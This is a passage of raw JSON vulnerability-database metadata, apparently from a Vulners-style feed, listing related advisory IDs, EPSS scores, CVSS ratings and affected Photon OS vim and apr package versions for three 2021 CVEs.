"PHSA-2021-4.0-0085", "PHSA-2021-4.0-0086", "PHSA-2021-4.0-0090", "PHSA-2021-4.0-0091", "PHSA-2021-4.0-0092", "PHSA-2021-4.0-0093", "PHSA-2021-4.0-0094", "PHSA-2021-4.0-0095", "PHSA-2021-4.0-0096", "PHSA-2021-4.0-0099", "PHSA-2021-4.0-0100", "PHSA-2021-4.0-0101", "PHSA-2021-4.0-0102", "PHSA-2021-4.0-0104", "PHSA-2021-4.0-0105", "PHSA-2021-4.0-0109", "PHSA-2021-4.0-0110", "PHSA-2021-4.0-0112", "PHSA-2021-4.0-0113", "PHSA-2021-4.0-0115", "PHSA-2021-4.0-0116", "PHSA-2021-4.0-0118", "PHSA-2021-4.0-0119", "PHSA-2021-4.0-0122", "PHSA-2021-4.0-0123", "PHSA-2021-4.0-0124", "PHSA-2021-4.0-0126", "PHSA-2021-4.0-0127", "PHSA-2021-4.0-0129", "PHSA-2021-4.0-0130", "PHSA-2021-4.0-0135", "PHSA-2021-4.0-0138", "PHSA-2021-4.0-0139", "PHSA-2021-4.0-0140", "PHSA-2021-4.0-0141", "PHSA-2022-0429", "PHSA-2022-0431", "PHSA-2022-0432", "PHSA-2022-0433", "PHSA-2022-0434", "PHSA-2022-0435", "PHSA-2022-0436", "PHSA-2022-0437", "PHSA-2022-0439", "PHSA-2022-0440", "PHSA-2022-0441", "PHSA-2022-0442", "PHSA-2022-0443", "PHSA-2022-0444", "PHSA-2022-0445", "PHSA-2022-0446", "PHSA-2022-0447", "PHSA-2022-0448", "PHSA-2022-0449", "PHSA-2022-0450", "PHSA-2022-0451", "PHSA-2022-0452", "PHSA-2022-0453", "PHSA-2022-0454", "PHSA-2022-0455", "PHSA-2022-0456", "PHSA-2022-0457", "PHSA-2022-0458", "PHSA-2022-0459", "PHSA-2022-0460", "PHSA-2022-0461", "PHSA-2022-0462", "PHSA-2022-0463", "PHSA-2022-0464", "PHSA-2022-0465", "PHSA-2022-0466", "PHSA-2022-0467", "PHSA-2022-0468", "PHSA-2022-0469", "PHSA-2022-0470", "PHSA-2022-0471", "PHSA-2022-0472", "PHSA-2022-0473", "PHSA-2022-0474", "PHSA-2022-0475", "PHSA-2022-0476", "PHSA-2022-0477", "PHSA-2022-0478", "PHSA-2022-0479", "PHSA-2022-0480", "PHSA-2022-0481", "PHSA-2022-0482", "PHSA-2022-0483", "PHSA-2022-0484", "PHSA-2022-0485", "PHSA-2022-0486", "PHSA-2022-0487", "PHSA-2022-0488", "PHSA-2022-0489", "PHSA-2022-0490", "PHSA-2022-0491", "PHSA-2022-0492", "PHSA-2022-0493", "PHSA-2022-0494", "PHSA-2022-0495", "PHSA-2022-0496", "PHSA-2022-0497", "PHSA-2022-0498", "PHSA-2022-0499", "PHSA-2022-0501", "PHSA-2022-0502", "PHSA-2022-0503", "PHSA-2022-0504", "PHSA-2022-0506", "PHSA-2022-0508", "PHSA-2022-0509", "PHSA-2022-0510", "PHSA-2022-0511", "PHSA-2022-0512", "PHSA-2022-0513", "PHSA-2022-0514", "PHSA-2022-0515", "PHSA-2022-0516", "PHSA-2022-0517", "PHSA-2022-0518", "PHSA-2022-0519", "PHSA-2022-0520", "PHSA-2022-0522", "PHSA-2022-0523", "PHSA-2022-0524", "PHSA-2022-0525", "PHSA-2022-0526", "PHSA-2022-0527", "PHSA-2022-0528", "PHSA-2022-0529", "PHSA-2022-0530", "PHSA-2022-0531", "PHSA-2022-0532", "PHSA-2022-0533", "PHSA-2022-0534", "PHSA-2022-0536", "PHSA-2022-0538", "PHSA-2022-0540", "PHSA-2022-0541", "PHSA-2022-0542", "PHSA-2022-0543", "PHSA-2022-0546", "PHSA-2022-0547", "PHSA-2022-0550", "PHSA-2022-0551", "PHSA-2022-3.0-0347", "PHSA-2022-3.0-0348", "PHSA-2022-3.0-0349", "PHSA-2022-3.0-0350", "PHSA-2022-3.0-0351", "PHSA-2022-3.0-0352", "PHSA-2022-3.0-0353", "PHSA-2022-3.0-0354", "PHSA-2022-3.0-0356", "PHSA-2022-3.0-0358", "PHSA-2022-3.0-0359", "PHSA-2022-3.0-0361", "PHSA-2022-3.0-0362", "PHSA-2022-3.0-0363", "PHSA-2022-3.0-0364", "PHSA-2022-3.0-0365", "PHSA-2022-3.0-0366", "PHSA-2022-3.0-0367", "PHSA-2022-3.0-0368", "PHSA-2022-3.0-0369", "PHSA-2022-3.0-0370", "PHSA-2022-3.0-0371", "PHSA-2022-3.0-0372", "PHSA-2022-3.0-0373", "PHSA-2022-3.0-0374", "PHSA-2022-3.0-0375", "PHSA-2022-3.0-0376", "PHSA-2022-3.0-0377", "PHSA-2022-3.0-0379", "PHSA-2022-3.0-0380", "PHSA-2022-3.0-0381", "PHSA-2022-3.0-0382", "PHSA-2022-3.0-0383", "PHSA-2022-3.0-0386", "PHSA-2022-3.0-0388", "PHSA-2022-3.0-0389", "PHSA-2022-3.0-0390", "PHSA-2022-3.0-0391", "PHSA-2022-3.0-0392", "PHSA-2022-3.0-0393", "PHSA-2022-3.0-0394", "PHSA-2022-3.0-0395", "PHSA-2022-3.0-0396", "PHSA-2022-3.0-0397", "PHSA-2022-3.0-0398", "PHSA-2022-3.0-0399", "PHSA-2022-3.0-0400", "PHSA-2022-3.0-0402", "PHSA-2022-3.0-0404", "PHSA-2022-3.0-0405", "PHSA-2022-3.0-0406", "PHSA-2022-3.0-0408", "PHSA-2022-3.0-0409", "PHSA-2022-3.0-0411", "PHSA-2022-3.0-0412", "PHSA-2022-3.0-0415", "PHSA-2022-3.0-0418", "PHSA-2022-3.0-0421", "PHSA-2022-3.0-0422", "PHSA-2022-3.0-0424", "PHSA-2022-3.0-0425", "PHSA-2022-3.0-0426", "PHSA-2022-3.0-0428", "PHSA-2022-3.0-0429", "PHSA-2022-3.0-0430", "PHSA-2022-3.0-0431", "PHSA-2022-3.0-0433", "PHSA-2022-3.0-0434", "PHSA-2022-3.0-0436", "PHSA-2022-3.0-0437", "PHSA-2022-3.0-0440", "PHSA-2022-3.0-0441", "PHSA-2022-3.0-0442", "PHSA-2022-3.0-0443", "PHSA-2022-3.0-0444", "PHSA-2022-3.0-0445", "PHSA-2022-3.0-0446", "PHSA-2022-3.0-0447", "PHSA-2022-3.0-0449", "PHSA-2022-3.0-0450", "PHSA-2022-3.0-0451", "PHSA-2022-3.0-0452", "PHSA-2022-3.0-0453", "PHSA-2022-3.0-0455", "PHSA-2022-3.0-0456", "PHSA-2022-3.0-0458", "PHSA-2022-3.0-0459", "PHSA-2022-3.0-0461", "PHSA-2022-3.0-0462", "PHSA-2022-3.0-0463", "PHSA-2022-3.0-0464", "PHSA-2022-3.0-0465", "PHSA-2022-3.0-0470", "PHSA-2022-3.0-0471", "PHSA-2022-3.0-0473", "PHSA-2022-3.0-0474", "PHSA-2022-3.0-0476", "PHSA-2022-3.0-0477", "PHSA-2022-3.0-0478", "PHSA-2022-3.0-0479", "PHSA-2022-3.0-0480", "PHSA-2022-3.0-0481", "PHSA-2022-3.0-0483", "PHSA-2022-3.0-0485", "PHSA-2022-3.0-0486", "PHSA-2022-3.0-0487", "PHSA-2022-3.0-0488", "PHSA-2022-3.0-0489", "PHSA-2022-3.0-0491", "PHSA-2022-3.0-0493", "PHSA-2022-3.0-0499", "PHSA-2022-3.0-0500", "PHSA-2022-3.0-0502", "PHSA-2022-3.0-0504", "PHSA-2022-3.0-0505", "PHSA-2022-3.0-0507", "PHSA-2022-3.0-0508", "PHSA-2022-3.0-0509", "PHSA-2022-4.0-0142", "PHSA-2022-4.0-0143", "PHSA-2022-4.0-0144", "PHSA-2022-4.0-0145", "PHSA-2022-4.0-0146", "PHSA-2022-4.0-0147", "PHSA-2022-4.0-0148", "PHSA-2022-4.0-0149", "PHSA-2022-4.0-0151", "PHSA-2022-4.0-0152", "PHSA-2022-4.0-0153", "PHSA-2022-4.0-0154", "PHSA-2022-4.0-0155", "PHSA-2022-4.0-0156", "PHSA-2022-4.0-0157", "PHSA-2022-4.0-0158", "PHSA-2022-4.0-0159", "PHSA-2022-4.0-0160", "PHSA-2022-4.0-0161", "PHSA-2022-4.0-0162", "PHSA-2022-4.0-0163", "PHSA-2022-4.0-0164", "PHSA-2022-4.0-0165", "PHSA-2022-4.0-0166", "PHSA-2022-4.0-0167", "PHSA-2022-4.0-0168", "PHSA-2022-4.0-0169", "PHSA-2022-4.0-0170", "PHSA-2022-4.0-0171", "PHSA-2022-4.0-0172", "PHSA-2022-4.0-0173", "PHSA-2022-4.0-0176", "PHSA-2022-4.0-0178", "PHSA-2022-4.0-0182", "PHSA-2022-4.0-0183", "PHSA-2022-4.0-0184", "PHSA-2022-4.0-0185", "PHSA-2022-4.0-0187", "PHSA-2022-4.0-0188", "PHSA-2022-4.0-0189", "PHSA-2022-4.0-0192", "PHSA-2022-4.0-0194", "PHSA-2022-4.0-0195", "PHSA-2022-4.0-0198", "PHSA-2022-4.0-0199", "PHSA-2022-4.0-0201", "PHSA-2022-4.0-0202", "PHSA-2022-4.0-0205", "PHSA-2022-4.0-0207", "PHSA-2022-4.0-0208", "PHSA-2022-4.0-0209", "PHSA-2022-4.0-0213", "PHSA-2022-4.0-0214", "PHSA-2022-4.0-0216", "PHSA-2022-4.0-0218", "PHSA-2022-4.0-0220", "PHSA-2022-4.0-0221", "PHSA-2022-4.0-0223", "PHSA-2022-4.0-0224", "PHSA-2022-4.0-0226", "PHSA-2022-4.0-0227", "PHSA-2022-4.0-0230", "PHSA-2022-4.0-0231", "PHSA-2022-4.0-0232", "PHSA-2022-4.0-0234", "PHSA-2022-4.0-0235", "PHSA-2022-4.0-0236", "PHSA-2022-4.0-0237", "PHSA-2022-4.0-0238", "PHSA-2022-4.0-0240", "PHSA-2022-4.0-0242", "PHSA-2022-4.0-0243", "PHSA-2022-4.0-0244", "PHSA-2022-4.0-0245", "PHSA-2022-4.0-0246", "PHSA-2022-4.0-0247", "PHSA-2022-4.0-0248", "PHSA-2022-4.0-0249", "PHSA-2022-4.0-0250", "PHSA-2022-4.0-0251", "PHSA-2022-4.0-0252", "PHSA-2022-4.0-0253", "PHSA-2022-4.0-0256", "PHSA-2022-4.0-0257", "PHSA-2022-4.0-0259", "PHSA-2022-4.0-0262", "PHSA-2022-4.0-0263", "PHSA-2022-4.0-0266", "PHSA-2022-4.0-0267", "PHSA-2022-4.0-0269", "PHSA-2022-4.0-0270", "PHSA-2022-4.0-0271", "PHSA-2022-4.0-0272", "PHSA-2022-4.0-0273", "PHSA-2022-4.0-0274", "PHSA-2022-4.0-0275", "PHSA-2022-4.0-0276", "PHSA-2022-4.0-0279", "PHSA-2022-4.0-0280", "PHSA-2022-4.0-0282", "PHSA-2022-4.0-0283", "PHSA-2022-4.0-0285", "PHSA-2022-4.0-0286", "PHSA-2022-4.0-0288", "PHSA-2022-4.0-0289", "PHSA-2022-4.0-0290", "PHSA-2022-4.0-0293", "PHSA-2022-4.0-0294", "PHSA-2022-4.0-0297", "PHSA-2022-4.0-0298", "PHSA-2022-4.0-0299", "PHSA-2022-4.0-0300", "PHSA-2022-4.0-0303", "PHSA-2022-4.0-0304", "PHSA-2022-4.0-0305", "PHSA-2023-0552", "PHSA-2023-3.0-0510", "PHSA-2023-3.0-0511", "PHSA-2023-3.0-0513", "PHSA-2023-3.0-0516", "PHSA-2023-3.0-0518", "PHSA-2023-3.0-0519", "PHSA-2023-3.0-0520", "PHSA-2023-3.0-0521", "PHSA-2023-3.0-0522", "PHSA-2023-3.0-0523", "PHSA-2023-3.0-0526", "PHSA-2023-3.0-0527", "PHSA-2023-3.0-0528", "PHSA-2023-3.0-0529", "PHSA-2023-3.0-0530", "PHSA-2023-3.0-0531", "PHSA-2023-3.0-0532", "PHSA-2023-3.0-0533", "PHSA-2023-3.0-0538", "PHSA-2023-3.0-0541", "PHSA-2023-3.0-0544", "PHSA-2023-3.0-0545", "PHSA-2023-3.0-0547", "PHSA-2023-3.0-0549", "PHSA-2023-3.0-0552", "PHSA-2023-3.0-0554", "PHSA-2023-3.0-0556", "PHSA-2023-3.0-0559", "PHSA-2023-3.0-0562", "PHSA-2023-3.0-0563", "PHSA-2023-3.0-0564", "PHSA-2023-3.0-0566", "PHSA-2023-3.0-0568", "PHSA-2023-3.0-0569", "PHSA-2023-3.0-0570", "PHSA-2023-3.0-0573", "PHSA-2023-3.0-0574", "PHSA-2023-3.0-0575", "PHSA-2023-3.0-0576", "PHSA-2023-3.0-0578", "PHSA-2023-3.0-0579", "PHSA-2023-3.0-0580", "PHSA-2023-3.0-0581", "PHSA-2023-3.0-0583", "PHSA-2023-3.0-0584", "PHSA-2023-3.0-0585", "PHSA-2023-3.0-0586", "PHSA-2023-3.0-0587", "PHSA-2023-3.0-0588", "PHSA-2023-3.0-0589", "PHSA-2023-3.0-0590", "PHSA-2023-3.0-0591", "PHSA-2023-3.0-0593", "PHSA-2023-3.0-0594", "PHSA-2023-3.0-0595", "PHSA-2023-3.0-0597", "PHSA-2023-3.0-0598", "PHSA-2023-3.0-0599", "PHSA-2023-3.0-0601", "PHSA-2023-3.0-0602", "PHSA-2023-3.0-0603", "PHSA-2023-3.0-0604", "PHSA-2023-3.0-0605", "PHSA-2023-3.0-0606", "PHSA-2023-3.0-0607", "PHSA-2023-3.0-0608", "PHSA-2023-3.0-0610", "PHSA-2023-3.0-0611", "PHSA-2023-3.0-0612", "PHSA-2023-3.0-0613", "PHSA-2023-3.0-0614", "PHSA-2023-3.0-0615", "PHSA-2023-3.0-0616", "PHSA-2023-3.0-0617", "PHSA-2023-3.0-0618", "PHSA-2023-3.0-0619", "PHSA-2023-3.0-0620", "PHSA-2023-3.0-0621", "PHSA-2023-3.0-0623", "PHSA-2023-3.0-0624", "PHSA-2023-3.0-0625", "PHSA-2023-3.0-0626", "PHSA-2023-3.0-0627", "PHSA-2023-3.0-0628", "PHSA-2023-3.0-0629", "PHSA-2023-3.0-0631", "PHSA-2023-3.0-0632", "PHSA-2023-3.0-0637", "PHSA-2023-3.0-0640", "PHSA-2023-3.0-0642", "PHSA-2023-3.0-0643", "PHSA-2023-3.0-0644", "PHSA-2023-3.0-0645", "PHSA-2023-3.0-0646", "PHSA-2023-3.0-0647", "PHSA-2023-3.0-0649", "PHSA-2023-3.0-0650", "PHSA-2023-3.0-0651", "PHSA-2023-3.0-0652", "PHSA-2023-3.0-0653", "PHSA-2023-3.0-0655", "PHSA-2023-3.0-0656", "PHSA-2023-3.0-0657", "PHSA-2023-3.0-0661", "PHSA-2023-3.0-0663", "PHSA-2023-3.0-0665", "PHSA-2023-3.0-0667", "PHSA-2023-3.0-0668", "PHSA-2023-3.0-0670", "PHSA-2023-3.0-0671", "PHSA-2023-3.0-0672", "PHSA-2023-3.0-0673", "PHSA-2023-3.0-0674", "PHSA-2023-3.0-0675", "PHSA-2023-3.0-0676", "PHSA-2023-3.0-0678", "PHSA-2023-3.0-0680", "PHSA-2023-3.0-0681", "PHSA-2023-3.0-0682", "PHSA-2023-3.0-0683", "PHSA-2023-3.0-0684", "PHSA-2023-3.0-0685", "PHSA-2023-3.0-0686", "PHSA-2023-3.0-0687", "PHSA-2023-3.0-0689", "PHSA-2023-3.0-0690", "PHSA-2023-3.0-0692", "PHSA-2023-4.0-0306", "PHSA-2023-4.0-0307", "PHSA-2023-4.0-0308", "PHSA-2023-4.0-0309", "PHSA-2023-4.0-0310", "PHSA-2023-4.0-0314", "PHSA-2023-4.0-0315", "PHSA-2023-4.0-0316", "PHSA-2023-4.0-0318", "PHSA-2023-4.0-0319", "PHSA-2023-4.0-0320", "PHSA-2023-4.0-0321", "PHSA-2023-4.0-0322", "PHSA-2023-4.0-0323", "PHSA-2023-4.0-0324", "PHSA-2023-4.0-0325", "PHSA-2023-4.0-0326", "PHSA-2023-4.0-0327", "PHSA-2023-4.0-0328", "PHSA-2023-4.0-0329", "PHSA-2023-4.0-0330", "PHSA-2023-4.0-0331", "PHSA-2023-4.0-0332", "PHSA-2023-4.0-0333", "PHSA-2023-4.0-0334", "PHSA-2023-4.0-0336", "PHSA-2023-4.0-0337", "PHSA-2023-4.0-0338", "PHSA-2023-4.0-0339", "PHSA-2023-4.0-0340", "PHSA-2023-4.0-0342", "PHSA-2023-4.0-0345", "PHSA-2023-4.0-0348", "PHSA-2023-4.0-0349", "PHSA-2023-4.0-0350", "PHSA-2023-4.0-0352", "PHSA-2023-4.0-0354", "PHSA-2023-4.0-0359", "PHSA-2023-4.0-0362", "PHSA-2023-4.0-0364", "PHSA-2023-4.0-0365", "PHSA-2023-4.0-0366", "PHSA-2023-4.0-0369", "PHSA-2023-4.0-0370", "PHSA-2023-4.0-0371", "PHSA-2023-4.0-0372", "PHSA-2023-4.0-0373", "PHSA-2023-4.0-0375", "PHSA-2023-4.0-0377", "PHSA-2023-4.0-0379", "PHSA-2023-4.0-0380", "PHSA-2023-4.0-0381", "PHSA-2023-4.0-0383", "PHSA-2023-4.0-0384", "PHSA-2023-4.0-0386", "PHSA-2023-4.0-0387", "PHSA-2023-4.0-0389", "PHSA-2023-4.0-0391", "PHSA-2023-4.0-0392", "PHSA-2023-4.0-0393", "PHSA-2023-4.0-0394", "PHSA-2023-4.0-0395", "PHSA-2023-4.0-0396", "PHSA-2023-4.0-0397", "PHSA-2023-4.0-0398", "PHSA-2023-4.0-0399", "PHSA-2023-4.0-0400", "PHSA-2023-4.0-0401", "PHSA-2023-4.0-0402", "PHSA-2023-4.0-0404", "PHSA-2023-4.0-0405", "PHSA-2023-4.0-0406", "PHSA-2023-4.0-0408", "PHSA-2023-4.0-0409", "PHSA-2023-4.0-0410", "PHSA-2023-4.0-0411", "PHSA-2023-4.0-0413", "PHSA-2023-4.0-0414", "PHSA-2023-4.0-0415", "PHSA-2023-4.0-0416", "PHSA-2023-4.0-0417", "PHSA-2023-4.0-0419", "PHSA-2023-4.0-0420", "PHSA-2023-4.0-0423", "PHSA-2023-4.0-0424", "PHSA-2023-4.0-0425", "PHSA-2023-4.0-0426", "PHSA-2023-4.0-0427", "PHSA-2023-4.0-0428", "PHSA-2023-4.0-0429", "PHSA-2023-4.0-0431", "PHSA-2023-4.0-0432", "PHSA-2023-4.0-0433", "PHSA-2023-4.0-0434", "PHSA-2023-4.0-0435", "PHSA-2023-4.0-0436", "PHSA-2023-4.0-0438", "PHSA-2023-4.0-0439", "PHSA-2023-4.0-0440", "PHSA-2023-4.0-0441", "PHSA-2023-4.0-0442", "PHSA-2023-4.0-0443", "PHSA-2023-4.0-0444", "PHSA-2023-4.0-0446", "PHSA-2023-4.0-0449", "PHSA-2023-4.0-0450", "PHSA-2023-4.0-0452", "PHSA-2023-4.0-0455", "PHSA-2023-4.0-0457", "PHSA-2023-4.0-0458", "PHSA-2023-4.0-0459", "PHSA-2023-4.0-0460", "PHSA-2023-4.0-0461", "PHSA-2023-4.0-0462", "PHSA-2023-4.0-0463", "PHSA-2023-4.0-0465", "PHSA-2023-4.0-0466", "PHSA-2023-4.0-0467", "PHSA-2023-4.0-0468", "PHSA-2023-4.0-0469", "PHSA-2023-4.0-0471", "PHSA-2023-4.0-0472", "PHSA-2023-4.0-0474", "PHSA-2023-4.0-0475", "PHSA-2023-4.0-0478", "PHSA-2023-4.0-0479", "PHSA-2023-4.0-0480", "PHSA-2023-4.0-0481", "PHSA-2023-4.0-0482", "PHSA-2023-4.0-0483", "PHSA-2023-4.0-0484", "PHSA-2023-4.0-0486", "PHSA-2023-4.0-0487", "PHSA-2023-4.0-0488", "PHSA-2023-4.0-0490", "PHSA-2023-4.0-0491", "PHSA-2023-4.0-0492", "PHSA-2023-4.0-0494", "PHSA-2023-4.0-0495", "PHSA-2023-4.0-0496", "PHSA-2023-4.0-0497", "PHSA-2023-4.0-0499", "PHSA-2023-4.0-0500", "PHSA-2023-4.0-0502", "PHSA-2023-4.0-0504", "PHSA-2023-4.0-0505", "PHSA-2023-4.0-0506", "PHSA-2023-4.0-0507", "PHSA-2023-4.0-0508", "PHSA-2023-4.0-0509", "PHSA-2023-4.0-0510", "PHSA-2023-4.0-0512", "PHSA-2023-4.0-0513", "PHSA-2023-4.0-0515", "PHSA-2023-4.0-0516", "PHSA-2023-4.0-0517", "PHSA-2023-4.0-0518", "PHSA-2023-4.0-0520", "PHSA-2023-4.0-0521", "PHSA-2023-5.0-0001", "PHSA-2023-5.0-0005", "PHSA-2023-5.0-0006", "PHSA-2023-5.0-0008", "PHSA-2023-5.0-0009", "PHSA-2023-5.0-0010", "PHSA-2023-5.0-0011", "PHSA-2023-5.0-0012", "PHSA-2023-5.0-0013", "PHSA-2023-5.0-0014", "PHSA-2023-5.0-0015", "PHSA-2023-5.0-0017", "PHSA-2023-5.0-0018", "PHSA-2023-5.0-0020", "PHSA-2023-5.0-0021", "PHSA-2023-5.0-0022", "PHSA-2023-5.0-0023", "PHSA-2023-5.0-0024", "PHSA-2023-5.0-0025", "PHSA-2023-5.0-0028", "PHSA-2023-5.0-0029", "PHSA-2023-5.0-0030", "PHSA-2023-5.0-0031", "PHSA-2023-5.0-0032", "PHSA-2023-5.0-0033", "PHSA-2023-5.0-0034", "PHSA-2023-5.0-0035", "PHSA-2023-5.0-0036", "PHSA-2023-5.0-0037", "PHSA-2023-5.0-0038", "PHSA-2023-5.0-0039", "PHSA-2023-5.0-0040", "PHSA-2023-5.0-0041", "PHSA-2023-5.0-0043", "PHSA-2023-5.0-0044", "PHSA-2023-5.0-0045", "PHSA-2023-5.0-0046", "PHSA-2023-5.0-0047", "PHSA-2023-5.0-0048", "PHSA-2023-5.0-0049", "PHSA-2023-5.0-0050", "PHSA-2023-5.0-0053", "PHSA-2023-5.0-0054", "PHSA-2023-5.0-0055", "PHSA-2023-5.0-0056", "PHSA-2023-5.0-0057", "PHSA-2023-5.0-0059", "PHSA-2023-5.0-0060", "PHSA-2023-5.0-0061", "PHSA-2023-5.0-0062", "PHSA-2023-5.0-0063", "PHSA-2023-5.0-0066", "PHSA-2023-5.0-0067", "PHSA-2023-5.0-0068", "PHSA-2023-5.0-0070", "PHSA-2023-5.0-0075", "PHSA-2023-5.0-0078", "PHSA-2023-5.0-0080", "PHSA-2023-5.0-0082", "PHSA-2023-5.0-0083", "PHSA-2023-5.0-0084", "PHSA-2023-5.0-0085", "PHSA-2023-5.0-0086", "PHSA-2023-5.0-0087", "PHSA-2023-5.0-0089", "PHSA-2023-5.0-0090", "PHSA-2023-5.0-0091", "PHSA-2023-5.0-0092", "PHSA-2023-5.0-0093", "PHSA-2023-5.0-0094", "PHSA-2023-5.0-0095", "PHSA-2023-5.0-0096", "PHSA-2023-5.0-0097", "PHSA-2023-5.0-0100", "PHSA-2023-5.0-0101", "PHSA-2023-5.0-0102", "PHSA-2023-5.0-0103", "PHSA-2023-5.0-0106", "PHSA-2023-5.0-0107", "PHSA-2023-5.0-0108", "PHSA-2023-5.0-0110", "PHSA-2023-5.0-0111", "PHSA-2023-5.0-0112", "PHSA-2023-5.0-0113", "PHSA-2023-5.0-0114", "PHSA-2023-5.0-0118", "PHSA-2023-5.0-0119", "PHSA-2023-5.0-0123", "PHSA-2023-5.0-0124", "PHSA-2023-5.0-0125", "PHSA-2023-5.0-0126", "PHSA-2023-5.0-0127", "PHSA-2023-5.0-0130", "PHSA-2023-5.0-0131", "PHSA-2023-5.0-0132", "PHSA-2023-5.0-0134", "PHSA-2023-5.0-0135", "PHSA-2023-5.0-0137", "PHSA-2023-5.0-0139", "PHSA-2023-5.0-0140", "PHSA-2023-5.0-0141", "PHSA-2023-5.0-0143", "PHSA-2023-5.0-0145", "PHSA-2023-5.0-0146", "PHSA-2023-5.0-0147", "PHSA-2023-5.0-0148", "PHSA-2023-5.0-0154"]}, {"type": "prion", "idList": ["PRION:CVE-2021-35940", "PRION:CVE-2021-3872", "PRION:CVE-2021-3875"]}, {"type": "redhat", "idList": ["RHSA-2022:0366", "RHSA-2022:0444", "RHSA-2022:0445", "RHSA-2022:0476", "RHSA-2022:0595", "RHSA-2022:0721", "RHSA-2022:0735", "RHSA-2022:0842", "RHSA-2022:0856"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-35940", "RH:CVE-2021-3872", "RH:CVE-2021-3875"]}, {"type": "rocky", "idList": ["RLSA-2022:0366"]}, {"type": "rosalinux", "idList": ["ROSA-SA-2023-2214"]}, {"type": "slackware", "idList": ["SSA-2023-032-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2022:0736-1", "SUSE-SU-2022:2102-1"]}, {"type": "thn", "idList": ["THN:17D0D209B56B4709BECDD8021277421F"]}, {"type": "ubuntu", "idList": ["USN-5056-1", "USN-5147-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-35940", "UB:CVE-2021-3872", "UB:CVE-2021-3875"]}, {"type": "veracode", "idList": ["VERACODE:32796", "VERACODE:32797", "VERACODE:35877"]}, {"type": "vmware", "idList": ["VMSA-2023-0026"]}]}, "epss": [{"cve": "CVE-2021-35940", "epss": 0.00055, "percentile": 0.20893, "modified": "2023-05-02"}, {"cve": "CVE-2021-3872", "epss": 0.0009, "percentile": 0.37114, "modified": "2023-05-02"}, {"cve": "CVE-2021-3875", "epss": 0.00079, "percentile": 0.326, "modified": "2023-05-02"}], "vulnersScore": 10.0}, "_state": {"score": 1701140426, "dependencies": 1701140295, "epss": 0}, "_internal": {"score_hash": "a87faf2c772f304e79d69fc6a4a763de"}, "affectedPackage": [{"OS": "Photon", "OSVersion": "4.0", "arch": "x86_64", "packageVersion": "8.2.3428-2.ph4", "packageFilename": "vim-extra-8.2.3428-2.ph4.x86_64.rpm", "operator": "lt", "packageName": "vim-extra"}, {"OS": "Photon", "OSVersion": "4.0", "arch": "x86_64", "packageVersion": "1.7.0-3.ph4", "packageFilename": "apr-devel-1.7.0-3.ph4.x86_64.rpm", "operator": "lt", "packageName": "apr-devel"}, {"OS": "Photon", "OSVersion": "4.0", "arch": "x86_64", "packageVersion": "1.7.0-3.ph4", "packageFilename": "apr-1.7.0-3.ph4.x86_64.rpm", "operator": "lt", "packageName": "apr"}, {"OS": "Photon", "OSVersion": "4.0", "arch": "x86_64", "packageVersion": "8.2.3428-2.ph4", "packageFilename": "vim-8.2.3428-2.ph4.x86_64.rpm", "operator": "lt", "packageName": "vim"}], "vendorCvss": {"severity": "important"}}

{"photon": [{"lastseen": "2022-05-12T18:54:06", "description": "Updates of ['vim', 'apr'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-28T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-0121", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35940", "CVE-2021-3872", "CVE-2021-3875"], "modified": "2021-10-28T00:00:00", "id": "PHSA-2021-0121", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-121", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T03:11:24", "description": "Updates of ['vim'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-10-30T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-3.0-0322", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3872", "CVE-2021-3875", "CVE-2023-34060"], "modified": "2021-10-30T00:00:00", "id": "PHSA-2021-3.0-0322", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-322", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T00:28:18", "description": "Updates of ['expat', 'vim'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 